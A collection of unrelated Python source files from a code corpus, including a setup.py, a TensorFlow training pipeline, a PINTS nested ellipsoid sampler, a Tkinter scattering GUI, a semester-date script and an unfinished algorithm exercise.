type=int,
default=1,
help="Number of tasks to spawn")
parser.add_argument("--pool_size",
type=int,
default=500,
help="Size of connection pool")
parser.add_argument("--ports",
type=str,
default="8888",
help="A comma-separated lists of ports to connect to")
args=parser.parse_args()
uvloop.install()
duration = asyncio.run(main(args.tasks, args.ports, args.pool_size))
seconds = duration.seconds + (duration.microseconds / 1000000)
if seconds > 0:
per_second = args.tasks / seconds
else:
per_second = args.tasks
print("Completed %d requests in %d.%d seconds (%d per second)" % (args.tasks, duration.seconds, duration.microseconds, int(per_second))) | StarcoderdataPython |
134756 | from setuptools import find_packages
from setuptools import setup
setup(
name="qontract-reconcile",
version="0.3.0",
license="Apache License 2.0",
author="<NAME>",
author_email="<EMAIL>",
python_requires=">=3.9",
description="Collection of tools to reconcile services with their desired "
"state as defined in the app-interface DB.",
url='https://github.com/app-sre/qontract-reconcile',
packages=find_packages(exclude=('tests',)),
package_data={'reconcile': ['templates/*.j2']},
install_requires=[
"sretoolbox~=1.2",
"Click>=7.0,<8.0",
"graphqlclient>=0.2.4,<0.3.0",
"toml>=0.10.0,<0.11.0",
"jsonpath-rw>=1.4.0,<1.5.0",
"PyGithub>=1.55,<1.56",
"hvac>=0.7.0,<0.8.0",
"ldap3>=2.9.1,<2.10.0",
"anymarkup>=0.7.0,<0.8.0",
"python-gitlab>=1.11.0,<1.12.0",
"semver~=2.13",
"python-terraform>=0.10.0,<0.11.0",
"boto3>=1.17.49,<=1.18.0",
"botocore>=1.20.49,<=1.21.0",
"urllib3>=1.25.4,<1.26.0",
"slack_sdk>=3.10,<4.0",
"pypd>=1.1.0,<1.2.0",
"Jinja2>=2.10.1,<2.11.0",
"jira>=2.0.0,<2.1.0",
"pyOpenSSL>=19.0.0,<20.0.0",
"ruamel.yaml>=0.16.5,<0.17.0",
"terrascript==0.9.0",
"tabulate>=0.8.6,<0.9.0",
"UnleashClient>=3.4.2,<3.5.0",
"prometheus-client~=0.8",
"sentry-sdk~=0.14",
"jenkins-job-builder==2.10.1",
"tzlocal==2.1",
"parse==1.18.0",
"sendgrid>=6.4.8,<6.5.0",
"dnspython~=2.1",
"requests==2.22.0",
"kubernetes~=12.0",
"openshift>=0.11.2",
"websocket-client<0.55.0,>=0.35",
"sshtunnel>=0.4.0",
"croniter>=1.0.15,<1.1.0",
"dyn~=1.8.1",
"transity-statuspageio>=0.0.3,<0.1",
"pydantic>=1.8.2,<1.9.0",
],
test_suite="tests",
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.9',
],
entry_points={
'console_scripts': [
'qontract-reconcile = reconcile.cli:integration',
'e2e-tests = e2e_tests.cli:test',
'app-interface-reporter = tools.app_interface_reporter:main',
'qontract-cli = tools.qontract_cli:root',
],
},
)
| StarcoderdataPython |
1750754 | <reponame>jacenkow/inside<filename>inside/pipelines/clevr.py
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
"""Training and evaluation pipeline for the networks."""
import csv
import os
import tensorflow as tf
from tensorflow.keras.metrics import Mean
from inside import config
from inside.callbacks import setup_callbacks
from inside.constructor import setup_comet_ml, setup_model
from inside.loaders import CLEVR
from inside.metrics import DiceScore
def _write_results(logs):
"""Write final logs to a CSV file."""
w = csv.writer(open(os.path.join(
config.EXPERIMENT_FOLDER, "results.csv"), "w"))
for key, val in logs.items():
w.writerow([key, val])
class Pipeline:
def __init__(self):
# Model.
self.model = setup_model()
# Comet.ml experiment.
self.comet_ml = setup_comet_ml()
# Testing metrics.
self.test_dice = DiceScore(name="testing_dice")
self.test_loss = Mean(name="testing_loss")
# Training metrics.
self.training_dice = DiceScore(name="training_dice")
self.training_loss = Mean(name="training_loss")
# Callbacks.
self.cl, self.es, self.mc, self.pp = setup_callbacks()
self.cl.model, self.es.model, self.mc.model = \
self.model, self.model, self.model
self.pp.model = self.model
self.pp.comet_ml = self.comet_ml
def fit(self):
"""Train the model."""
# Toy dataset.
loader = CLEVR()
train_ds, valid_ds, test_ds = loader.load()
with self.comet_ml.train():
self.cl.on_train_begin()
self.es.on_train_begin()
self.mc.on_train_begin()
self.pp.on_train_begin()
for epoch in range(config.EXPERIMENT_EPOCHS):
self.comet_ml.set_epoch(epoch)
for images, labels in train_ds:
self.train_step(images, labels)
for batch, (images, labels) in enumerate(valid_ds):
self.test_step(images, labels)
if not batch: # Log only first mini-batch from an epoch.
self.pp.on_epoch_end(epoch, images, labels)
# Get results.
logs = {
"dice": self.training_dice.result().numpy(),
"loss": self.training_loss.result().numpy(),
"validation_dice": self.test_dice.result().numpy(),
"validation_loss": self.test_loss.result().numpy(),
}
template = ("Epoch {}. Training Loss: {}. Training Dice: {}. "
"Validation Loss: {}. Validation Dice: {}.")
print(template.format(epoch + 1,
logs['loss'],
logs['dice'],
logs['validation_loss'],
logs['validation_dice']))
# Log metrics.
self.comet_ml.log_metrics(logs, epoch=epoch)
self.cl.on_epoch_end(epoch, logs)
self.es.on_epoch_end(epoch, logs)
self.mc.on_epoch_end(epoch, logs)
# Reset the metrics for the next epoch.
self.training_dice.reset_states()
self.training_loss.reset_states()
self.test_dice.reset_states()
self.test_loss.reset_states()
# Early stopping criterion.
if self.es.model.stop_training:
self.cl.on_train_end()
self.es.on_train_end()
self.mc.on_train_end()
break
with self.comet_ml.test():
for batch, (images, labels) in enumerate(test_ds):
self.test_step(images, labels)
if not batch:
self.pp.on_test_end(images, labels)
# Get results.
logs = {
"dice": self.test_dice.result().numpy(),
"loss": self.test_loss.result().numpy(),
}
print("Test Loss: {}. Test Dice: {}.".format(
logs['loss'], logs['dice']))
# Log metrics.
self.comet_ml.log_metrics(logs)
_write_results(logs)
@tf.function
def train_step(self, images, labels):
with tf.GradientTape() as tape:
predictions = self.model.inference(images)
loss = self.model.loss(labels, predictions)
gradients = tape.gradient(loss, self.model.trainable_variables)
self.model.optimiser.apply_gradients(
zip(gradients, self.model.trainable_variables))
self.training_loss(loss)
self.training_dice(labels, predictions)
@tf.function
def test_step(self, images, labels):
predictions = self.model.inference(images)
t_loss = self.model.loss(labels, predictions)
self.test_loss(t_loss)
self.test_dice(labels, predictions)
| StarcoderdataPython |
1691327 | import testtools
from barbicanclient import base
class TestValidateRef(testtools.TestCase):
def test_valid_ref(self):
ref = 'http://localhost/ff2ca003-5ebb-4b61-8a17-3f9c54ef6356'
self.assertTrue(base.validate_ref(ref, 'Thing'))
def test_invalid_uuid(self):
ref = 'http://localhost/not_a_uuid'
self.assertRaises(ValueError, base.validate_ref, ref, 'Thing')
| StarcoderdataPython |
1786214 | from django.core.management.base import BaseCommand
from django.conf import settings
from webdnd.player.views.index import UserIndex
from optparse import make_option
class Command(BaseCommand):
help = 'Creates with the search index'
option_list = BaseCommand.option_list + (
make_option('--flush',
action='store_true',
dest='flush',
default=False,
help='Remake the index from scratch'
),
make_option('--index',
action='append',
default=['all'],
dest='indicies',
help='Specify which index to refresh'
),
)
INDICIES = {
'users': {'class': UserIndex, 'dir': settings.USER_INDEX_DIR},
}
def handle(self, *args, **options):
self.flush = options['flush']
if 'all' in options['indicies']:
for index in self.INDICIES.values():
self.index(index)
else:
for index in options['indicies']:
if index in self.INDICIES:
self.index(self.INDICIES[index])
def index(self, index):
index = index['class'].get(index['dir'])
index.create_schema(flush=self.flush)
| StarcoderdataPython |
1729595 | <gh_stars>0
#
# Nested ellipsoidal sampler implementation.
#
# This file is part of PINTS (https://github.com/pints-team/pints/) which is
# released under the BSD 3-clause license. See accompanying LICENSE.md for
# copyright notice and full license details.
#
#
from __future__ import absolute_import, division
from __future__ import print_function, unicode_literals
import pints
import numpy as np
class NestedEllipsoidSampler(pints.NestedSampler):
r"""
Creates a nested sampler that estimates the marginal likelihood
and generates samples from the posterior.
This is the form of nested sampler described in [1]_, where an ellipsoid is
drawn around surviving particles (typically with an enlargement factor to
avoid missing prior mass), and then random samples are drawn from within
the bounds of the ellipsoid. By sampling in the space of surviving
particles, the efficiency of this algorithm aims to improve upon simple
rejection sampling. This algorithm has the following steps:
Initialise::
Z_0 = 0
X_0 = 1
Draw samples from prior::
for i in 1:n_active_points:
theta_i ~ p(theta), i.e. sample from the prior
L_i = p(theta_i|X)
endfor
L_min = min(L)
indexmin = min_index(L)
Run rejection sampling for ``n_rejection_samples`` to generate
an initial sample, along with updated values of ``L_min`` and
``indexmin``.
Fit active points using a minimum volume bounding ellipse. In our approach,
we do this with the following procedure (which we term
``minimum_volume_ellipsoid`` in what follows) that returns the positive
definite matrix A with centre c that define the ellipsoid
by :math:`(x - c)^t A (x - c) = 1`::
cov = covariance(transpose(active_points))
cov_inv = inv(cov)
c = mean(points)
for i in n_active_points:
dist[i] = (points[i] - c) * cov_inv * (points[i] - c)
endfor
enlargement_factor = max(dist)
A = (1.0 / enlargement_factor) * cov_inv
return A, c
From then on, in each iteration (t), the following occurs::
if mod(t, ellipsoid_update_gap) == 0:
A, c = minimum_volume_ellipsoid(active_points)
else:
if dynamic_enlargement_factor:
enlargement_factor *= (
exp(-(t + 1) / n_active_points)**alpha
)
endif
endif
theta* = ellipsoid_sample(enlargement_factor, A, c)
while p(theta*|X) < L_min:
theta* = ellipsoid_sample(enlargement_factor, A, c)
endwhile
theta_indexmin = theta*
L_indexmin = p(theta*|X)
If the parameter ``dynamic_enlargement_factor`` is true, the enlargement
factor is shrunk as the sampler runs, to avoid inefficiencies in later
iterations. By default, the enlargement factor begins at 1.1.
In ``ellipsoid_sample``, a point is drawn uniformly from within the minimum
volume ellipsoid, whose volume is increased by a factor
``enlargement_factor``.
At the end of iterations, there is a final ``Z`` increment::
Z = Z + (1 / n_active_points) * (L_1 + L_2 + ..., + L_n_active_points)
The posterior samples are generated as described in [2] on page 849 by
weighting each dropped sample in proportion to the volume of the
posterior region it was sampled from. That is, the probability
for drawing a given sample j is given by::
p_j = L_j * w_j / Z
where j = 1, ..., n_iterations.
Extends :class:`NestedSampler`.
References
----------
.. [1] "A nested sampling algorithm for cosmological model selection",
<NAME>, <NAME>, <NAME>, 2008.
arXiv: arXiv:astro-ph/0508461v2 11 Jan 2006
https://doi.org/10.1086/501068
"""
def __init__(self, log_prior):
super(NestedEllipsoidSampler, self).__init__(log_prior)
# Gaps between updating ellipsoid
self.set_ellipsoid_update_gap()
# Enlargement factor for ellipsoid
self.set_enlargement_factor()
self._f0 = self._enlargement_factor - 1
# Initial phase of rejection sampling
# Number of nested rejection samples before starting ellipsoidal
# sampling
self.set_n_rejection_samples()
self.set_initial_phase(True)
self._needs_sensitivities = False
# Dynamically vary the enlargement factor
self._dynamic_enlargement_factor = False
self._alpha = 0.2
self._A = None
self._centroid = None
def set_dynamic_enlargement_factor(self, dynamic_enlargement_factor):
"""
Sets dynamic enlargement factor
"""
self._dynamic_enlargement_factor = bool(dynamic_enlargement_factor)
def dynamic_enlargement_factor(self):
"""
Returns dynamic enlargement factor.
"""
return self._dynamic_enlargement_factor
def set_alpha(self, alpha):
"""
Sets alpha which controls rate of decline of enlargement factor
with iteration (when `dynamic_enlargement_factor` is true).
"""
if alpha < 0 or alpha > 1:
raise ValueError('alpha must be between 0 and 1.')
self._alpha = alpha
def alpha(self):
"""
Returns alpha which controls rate of decline of enlargement factor
with iteration (when `dynamic_enlargement_factor` is true).
"""
return self._alpha
def set_initial_phase(self, in_initial_phase):
""" See :meth:`pints.NestedSampler.set_initial_phase()`. """
self._rejection_phase = bool(in_initial_phase)
def needs_initial_phase(self):
""" See :meth:`pints.NestedSampler.needs_initial_phase()`. """
return True
def in_initial_phase(self):
""" See :meth:`pints.NestedSampler.in_initial_phase()`. """
return self._rejection_phase
def ellipsoid_update_gap(self):
"""
Returns the ellipsoid update gap used in the algorithm (see
:meth:`set_ellipsoid_update_gap()`).
"""
return self._ellipsoid_update_gap
def enlargement_factor(self):
"""
Returns the enlargement factor used in the algorithm (see
:meth:`set_enlargement_factor()`).
"""
return self._enlargement_factor
def n_rejection_samples(self):
"""
Returns the number of rejection sample used in the algorithm (see
:meth:`set_n_rejection_samples()`).
"""
return self._n_rejection_samples
def ask(self, n_points):
"""
If in initial phase, then uses rejection sampling. Afterwards,
points are drawn from within an ellipse (needs to be in uniform
sampling regime).
"""
i = self._accept_count
if (i + 1) % self._n_rejection_samples == 0:
self._rejection_phase = False
# determine bounding ellipsoid
self._A, self._centroid = self._minimum_volume_ellipsoid(
self._m_active[:, :self._n_parameters]
)
if self._rejection_phase:
if n_points > 1:
self._proposed = self._log_prior.sample(n_points)
else:
self._proposed = self._log_prior.sample(n_points)[0]
else:
# update bounding ellipsoid if sufficient samples taken
if ((i + 1 - self._n_rejection_samples)
% self._ellipsoid_update_gap == 0):
self._A, self._centroid = self._minimum_volume_ellipsoid(
self._m_active[:, :self._n_parameters])
# From Feroz-Hobson (2008) below eq. (14)
if self._dynamic_enlargement_factor:
f = (
self._f0 *
np.exp(-(i + 1) / self._n_active_points)**self._alpha
)
self._enlargement_factor = 1 + f
# propose by sampling within ellipsoid
self._proposed = self._ellipsoid_sample(
self._enlargement_factor, self._A, self._centroid, n_points)
return self._proposed
def set_enlargement_factor(self, enlargement_factor=1.1):
"""
Sets the factor (>1) by which to increase the minimal volume
ellipsoidal in rejection sampling.
A higher value means it is less likely that areas of high probability
mass will be missed. A low value means that rejection sampling is more
efficient.
"""
if enlargement_factor <= 1:
raise ValueError('Enlargement factor must exceed 1.')
self._enlargement_factor = enlargement_factor
def set_n_rejection_samples(self, rejection_samples=200):
"""
Sets the number of rejection samples to take, which will be assigned
weights and ultimately produce a set of posterior samples.
"""
if rejection_samples < 0:
raise ValueError('Must have non-negative rejection samples.')
self._n_rejection_samples = rejection_samples
def set_ellipsoid_update_gap(self, ellipsoid_update_gap=100):
"""
Sets the frequency with which the minimum volume ellipsoid is
re-estimated as part of the nested rejection sampling algorithm.
A higher rate of this parameter means each sample will be more
efficiently produced, yet the cost of re-computing the ellipsoid
may mean it is better to update this not each iteration -- instead,
with gaps of ``ellipsoid_update_gap`` between each update. By default,
the ellipse is updated every 100 iterations.
"""
ellipsoid_update_gap = int(ellipsoid_update_gap)
if ellipsoid_update_gap <= 1:
raise ValueError('Ellipsoid update gap must exceed 1.')
self._ellipsoid_update_gap = ellipsoid_update_gap
def _minimum_volume_ellipsoid(self, points, tol=0.0):
"""
Finds an approximate minimum bounding ellipse in "center form":
``(x-c).T * A * (x-c) = 1``.
"""
cov = np.cov(np.transpose(points))
cov_inv = np.linalg.inv(cov)
c = np.mean(points, axis=0)
dist = np.zeros(len(points))
for i in range(len(points)):
dist[i] = np.matmul(np.matmul(points[i] - c, cov_inv),
points[i] - c)
enlargement_factor = np.max(dist)
A = (1 - tol) * (1.0 / enlargement_factor) * cov_inv
return A, c
def _ellipsoid_sample(self, enlargement_factor, A, centroid, n_points):
"""
Draws from the enlarged bounding ellipsoid.
"""
if n_points > 1:
return self._draw_from_ellipsoid(
np.linalg.inv((1 / enlargement_factor) * A),
centroid, n_points)
else:
return self._draw_from_ellipsoid(
np.linalg.inv((1 / enlargement_factor) * A), centroid, 1)[0]
def _draw_from_ellipsoid(self, covmat, cent, npts):
"""
Draw ``npts`` random uniform points from within an ellipsoid with a
covariance matrix covmat and a centroid cent, as per:
http://www.astro.gla.ac.uk/~matthew/blog/?p=368
"""
try:
ndims = covmat.shape[0]
except IndexError: # pragma: no cover
ndims = 1
# calculate eigen_values (e) and eigen_vectors (v)
eigen_values, eigen_vectors = np.linalg.eig(covmat)
idx = (-eigen_values).argsort()[::-1][:ndims]
e = eigen_values[idx]
v = eigen_vectors[:, idx]
e = np.diag(e)
# generate radii of hyperspheres
rs = np.random.uniform(0, 1, npts)
# generate points
pt = np.random.normal(0, 1, [npts, ndims])
# get scalings for each point onto the surface of a unit hypersphere
fac = np.sum(pt**2, axis=1)
# calculate scaling for each point to be within the unit hypersphere
# with radii rs
fac = (rs**(1 / ndims)) / np.sqrt(fac)
pnts = np.zeros((npts, ndims))
# scale points to the ellipsoid using the eigen_values and rotate with
# the eigen_vectors and add centroid
d = np.sqrt(np.diag(e))
d.shape = (ndims, 1)
for i in range(0, npts):
# scale points to a uniform distribution within unit hypersphere
pnts[i, :] = fac[i] * pt[i, :]
pnts[i, :] = np.dot(
np.multiply(pnts[i, :], np.transpose(d)),
np.transpose(v)
) + cent
return pnts
def name(self):
""" See :meth:`pints.NestedSampler.name()`. """
return 'Nested ellipsoidal sampler'
def n_hyper_parameters(self):
""" See :meth:`TunableMethod.n_hyper_parameters()`. """
return 6
def set_hyper_parameters(self, x):
"""
The hyper-parameter vector is ``[# active points, # rejection samples,
enlargement factor, ellipsoid update gap, dynamic enlargement factor,
alpha]``.
See :meth:`TunableMethod.set_hyper_parameters()`.
"""
self.set_n_active_points(x[0])
self.set_n_rejection_samples(x[1])
self.set_enlargement_factor(x[2])
self.set_ellipsoid_update_gap(x[3])
self.set_dynamic_enlargement_factor(x[4])
self.set_alpha(x[5])
| StarcoderdataPython |
3266707 | <reponame>DanPorter/Dans_Diffaction
"""
GUI for MultipleScattering code
"""
import sys, os
import matplotlib.pyplot as plt
import numpy as np
if sys.version_info[0] < 3:
import Tkinter as tk
else:
import tkinter as tk
from .. import functions_general as fg
from .. import functions_crystallography as fc
from .basic_widgets import StringViewer
from .basic_widgets import (TF, BF, SF, LF, HF, TTF, TTFG, TTBG,
bkg, ety, btn, opt, btn2,
btn_active, opt_active, txtcol,
btn_txt, ety_txt, opt_txt)
class MultipleScatteringGui:
"""
Simulate multiple scattering
"""
def __init__(self, xtl):
"""Initialise"""
self.xtl = xtl
# Create Tk inter instance
self.root = tk.Tk()
self.root.wm_title('Multiple Scattering %s' % xtl.name)
# self.root.minsize(width=640, height=480)
self.root.maxsize(width=self.root.winfo_screenwidth(), height=self.root.winfo_screenheight())
self.root.tk_setPalette(
background=bkg,
foreground=txtcol,
activeBackground=opt_active,
activeForeground=txtcol)
frame = tk.Frame(self.root)
frame.pack(side=tk.LEFT, anchor=tk.N)
# Variatbles
# hkl, azir=[0, 0, 1], pv=[1, 0], energy_range=[7.8, 8.2], numsteps=60,
# full=False, pv1=False, pv2=False, sfonly=True, pv1xsf1=False
self.reflection_h = tk.IntVar(frame, 1)
self.reflection_k = tk.IntVar(frame, 0)
self.reflection_l = tk.IntVar(frame, 0)
self.azir_h = tk.IntVar(frame, 0)
self.azir_k = tk.IntVar(frame, 0)
self.azir_l = tk.IntVar(frame, 1)
self.pv_x = tk.IntVar(frame, 1)
self.pv_y = tk.IntVar(frame, 0)
self.energy_value = tk.DoubleVar(frame, 8)
self.energy_range_width = tk.DoubleVar(frame, 0.1)
self.numsteps = tk.IntVar(frame, 101)
self.run_modes = ["full", "pv1", "pv2", "sfonly", "pv1xsf1"]
self.run_mode = tk.StringVar(frame, self.run_modes[3])
# ---Line 1---
line = tk.Frame(frame, bg=TTBG)
line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
var = tk.Label(line, text='Multiple Scattering by <NAME>', font=TTF, fg=TTFG, bg=TTBG)
var.pack()
# ---Line 2---
line = tk.Frame(frame)
line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
# Reflection
var = tk.Label(line, text='hkl:', font=LF)
var.pack(side=tk.LEFT, padx=5)
var = tk.Entry(line, textvariable=self.reflection_h, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
var.focus() # set initial selection
var.selection_range(0, tk.END)
var = tk.Entry(line, textvariable=self.reflection_k, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
var = tk.Entry(line, textvariable=self.reflection_l, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
# Azir
var = tk.Label(line, text='azir:', font=LF)
var.pack(side=tk.LEFT, padx=5)
var = tk.Entry(line, textvariable=self.azir_h, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
var = tk.Entry(line, textvariable=self.azir_k, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
var = tk.Entry(line, textvariable=self.azir_l, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
# pv
var = tk.Label(line, text='pv:', font=LF)
var.pack(side=tk.LEFT, padx=5)
var = tk.Entry(line, textvariable=self.pv_x, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
var = tk.Entry(line, textvariable=self.pv_y, font=TF, width=2, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
# ---Line 3---
line = tk.Frame(frame)
line.pack(side=tk.TOP, pady=5)
# run options
for mode in self.run_modes:
b = tk.Radiobutton(line, text=mode, variable=self.run_mode, value=mode, font=LF)
b.pack(side=tk.LEFT, padx=3)
# ---Line 4---
line = tk.Frame(frame)
line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
# energy
var = tk.Label(line, text='Energy:', font=LF)
var.pack(side=tk.LEFT, padx=5)
var = tk.Entry(line, textvariable=self.energy_value, font=TF, width=8, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
# Run button
var = tk.Button(line, text='Plot Azimuth', font=BF, command=self.fun_azimuth, width=10, bg=btn,
activebackground=btn_active)
var.pack(side=tk.RIGHT, padx=5)
# ---Line 5---
line = tk.Frame(frame)
line.pack(side=tk.TOP, fill=tk.X, expand=tk.YES, pady=5)
# energy
var = tk.Label(line, text='Energy Width:', font=LF)
var.pack(side=tk.LEFT, padx=5)
var = tk.Entry(line, textvariable=self.energy_range_width, font=TF, width=6, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT)
# numsteps
var = tk.Label(line, text='Steps:', font=LF)
var.pack(side=tk.LEFT, padx=5)
var = tk.Entry(line, textvariable=self.numsteps, font=TF, width=4, bg=ety, fg=ety_txt)
var.pack(side=tk.LEFT, padx=5)
# Run button
var = tk.Button(line, text='Plot Energy', font=BF, command=self.fun_energy, width=10, bg=btn,
activebackground=btn_active)
var.pack(side=tk.RIGHT, padx=5)
def fun_energy(self):
"""Run multiple scattering code"""
refh = self.reflection_h.get()
refk = self.reflection_k.get()
refl = self.reflection_l.get()
hkl = [refh, refk, refl]
azih = self.azir_h.get()
azik = self.azir_k.get()
azil = self.azir_l.get()
azir = [azih, azik, azil]
pv = [self.pv_x.get(), self.pv_y.get()]
en = self.energy_value.get()
wid = self.energy_range_width.get()
erange = [en-wid/2, en+wid/2]
numsteps = self.numsteps.get()
modes = {mode: False for mode in self.run_modes}
mode = self.run_mode.get()
modes[mode] = True
self.xtl.Plot.plot_multiple_scattering(hkl, azir, pv, erange, numsteps, **modes)
plt.show()
def fun_azimuth(self):
"""Run multiple scattering code"""
refh = self.reflection_h.get()
refk = self.reflection_k.get()
refl = self.reflection_l.get()
hkl = [refh, refk, refl]
azih = self.azir_h.get()
azik = self.azir_k.get()
azil = self.azir_l.get()
azir = [azih, azik, azil]
pv = [self.pv_x.get(), self.pv_y.get()]
energy = self.energy_value.get()
modes = {mode: False for mode in self.run_modes}
mode = self.run_mode.get()
modes[mode] = True
self.xtl.Plot.plot_ms_azimuth(hkl, energy, azir, pv, **modes)
plt.show()
| StarcoderdataPython |
3371904 | <filename>capstone-project/sim_env.py
class SIMEnv(object):
def __init__(self, proxy_table):
""" Initilise the Environment with informations from proxy_table """
pass
def step(self, action):
""" Take a action, calculate the reward and return these informations """
pass
def reset(self):
""" Reset the Environment to the initial state """
pass
def seed(self, seed=None):
""" Define the Environment seed """
pass
def _take_action(self, action):
""" Select all informations from proxy table (Fat, Carbo, Protein, Energy) """
pass
def _get_reward(self):
""" calculate the reward based on nutritional information """
pass
| StarcoderdataPython |
1637602 | # <NAME>, <EMAIL>
# Code for Generating Semester 6 Dates
import datetime
from collections import defaultdict
from num2words import num2words
import re
MONTHS = (
'January',
'February',
'March',
'April',
'May',
'June',
'July',
'August',
'September,'
'October',
'November',
'December'
)
SEMESTER = "sp22"
def daterange(date1, date2):
for n in range(int((date2 - date1).days)+1):
yield date1 + datetime.timedelta(n)
def parse_txt(path):
my_input = []
with open(path, 'r') as f:
for line in f:
my_input.append(line.strip('\n'))
events = list()
dates = list()
for i in range(len(my_input) - 1):
if any([m in my_input[i+1] for m in MONTHS]):
events.append(my_input[i])
dates.append(my_input[i+1])
# print(events)
# print(dates)
delims = (' , ', ' - ')
clean_dates = list()
for event, date in zip(events, dates):
datelist = list()
for d in delims:
if d in date:
d0, d1 = date.split(d)
datelist.append(d0)
datelist.append(d1)
if len(datelist) == 0:
datelist.append(date)
# print(event, datelist)
clean_dates.append(datelist)
retVal = defaultdict()
for event, date_range in zip(events, clean_dates):
# print(event)
cdr = list()
for date in date_range:
s_month, s_date, s_year = date.split(' ')
month = MONTHS.index(s_month) + 1
day = int(s_date[:-1])
year = int(s_year)
cdr.append((month, day, year))
start_dt = datetime.date(cdr[0][2], cdr[0][0], cdr[0][1])
if len(cdr) == 2:
end_dt = datetime.date(cdr[1][2], cdr[1][0], cdr[1][1])
else:
end_dt = start_dt
for dt in daterange(start_dt, end_dt):
# print(dt.strftime('%Y-%m-%d'))
retVal[dt] = event
return retVal
def school_day_diff(date1, date2, datedict=None): # date1 is earlier date, date2 is later date
retVal = 1
# print(date1, date2)
if date1 <= date2:
currdate = date2
while (currdate != date1):
if currdate not in datedict.keys():
if currdate.weekday() < 5:
retVal += 1
currdate = currdate - datetime.timedelta(1)
else:
retVal = (int)((date2 - date1).total_seconds()/86400)
return retVal
def dict_to_message(doc, days_after, abv=False):
retVal = ''
if isinstance(doc, int):
doc_word = num2words(doc, lang='en', to='ordinal')
else:
doc_word = 'last'
da_word = num2words(days_after, lang='en', to='cardinal')
retVal += 'Happy '
if days_after == 1:
retVal += f'{da_word} day after the '
if days_after >= 2:
retVal += f'{da_word} days after the '
retVal += f'{doc_word} day of class'
if abv:
word_list = re.findall(r"[\w']+", retVal[len('Happy '):])
retVal = 'Happy #'
for word in word_list:
retVal += word[0].upper()
retVal += "!"
return retVal
def dict_to_before_message(doc):
retVal = ''
plural_days = 's' if -doc > 1 else ''
plural_are = 'are' if -doc > 1 else 'is'
retVal = f'There {plural_are} {-doc} day{plural_days} until the first day of class.'
return retVal
def main():
d = parse_txt(f'input/{SEMESTER}_input.txt')
fdoc = None
ldoc = None
# find first day of class
for k, v in d.items():
if v == 'Courses begin':
fdoc = k
elif v == 'Courses end':
ldoc = k
# today = datetime.date.today()
datedoc = defaultdict()
starting = fdoc
while starting != ldoc + datetime.timedelta(1):
sdd = school_day_diff(fdoc, starting, d)
datedoc[starting] = sdd
starting += datetime.timedelta(1)
newdatedoc = defaultdict()
is_skip = 0
for i, (k, v) in enumerate(datedoc.items()):
vi = 0
if i != 0:
vi = datedoc[k - datetime.timedelta(1)]
if vi-v > -1:
is_skip += 1
else:
is_skip = 0
# print(k, v, is_skip)
newdatedoc[k] = (v, is_skip)
# print(newdatedoc)
before_datedoc = defaultdict()
before_date = datetime.date(2022, 1, 1)
while before_date != fdoc:
sdd = school_day_diff(fdoc, before_date)
before_datedoc[before_date] = sdd
before_date += datetime.timedelta(1)
with open(f'output/{SEMESTER}_output.txt', 'w') as f:
for k, v in before_datedoc.items():
message = dict_to_before_message(v)
# print(k, message)
f.write(str(k) + " | " + message + '\n')
for k, v in newdatedoc.items():
abv = True
if k != ldoc:
message = dict_to_message(*v, abv)
else:
message = dict_to_message(ldoc, 0, abv)
# print(k, message)
f.write(str(k) + " | " + message + '\n')
with open(f'output/{SEMESTER}_output_long.txt', 'w') as f:
for k, v in newdatedoc.items():
abv = False
if k != ldoc:
message = dict_to_message(*v, abv)
else:
message = dict_to_message(ldoc, 0, abv)
# print(k, message)
f.write(str(k) + " | " + message + '\n')
if __name__ == '__main__':
main() | StarcoderdataPython |
3348940 | <reponame>dexterchan/DailyChallenge
#You are given an array of integers. Return the length of the longest consecutive elements sequence in the array.
#For example, the input array [100, 4, 200, 1, 3, 2] has the longest consecutive sequence 1, 2, 3, 4, and thus, you should return its length, 4.
#Can you do this in linear time?
#Anaysis
#Sorting costs O(NlogN) , no good
# to archieve linear time, we need a linked list. creating double linked list on-the-fly of sorted number when scanning the array
# iterate the array
# create prev dict and next dict
# for each element, create a double linked node, say number 100
# insert 99->(node 100) into next dict
# insert 101 -> (node 100) into pre dict
# for next element, say 99 , find (node 100) in next dict,
# (node 99).next = (node 100), (node 99).prev = (node 100).prev, (node 99).prev.next = (node 99) , assign (node 100).prev to (node 99)
# also check 98 in prev dict, if not found , insert 98 -> (node 99) into prev dict
# in the end, we iterate double linked list, to find the longest consecutive sequence by O(N)
class dbNode:
def __init__(self, val=None, prev=None, next=None ):
self.val = val
self.prev = prev
self.next = next
def insert(self, node1, node2):
tmpNode = node1.next
node1.next = node2
node2.prev = node1
if tmpNode is not None:
tmpNode.prev = node2
node2.next = tmpNode
def __str__(self):
s = ""
n = self
while n is not None:
s = s + "," + str(n.val)
n = n.next
return str
class Solution:
def longest_consecutive(self, nums):
prevDict = {}
nextDict = {}
anchor = []
for n in nums:
node = dbNode(n)
if n in prevDict:
pNode = prevDict[n]
dbNode().insert(pNode, node)
else:
dummy = dbNode(None)
dbNode().insert(dummy, node)
anchor.append(dummy)
self.__insertNextDict(nextDict, node)
if n in nextDict:
nNode = nextDict[n]
if nNode.prev.val != None:
dbNode().insert(nNode.prev, node)
else:
dbNode().insert(node, nNode)
else:
self.__insertPrevDict(prevDict, node)
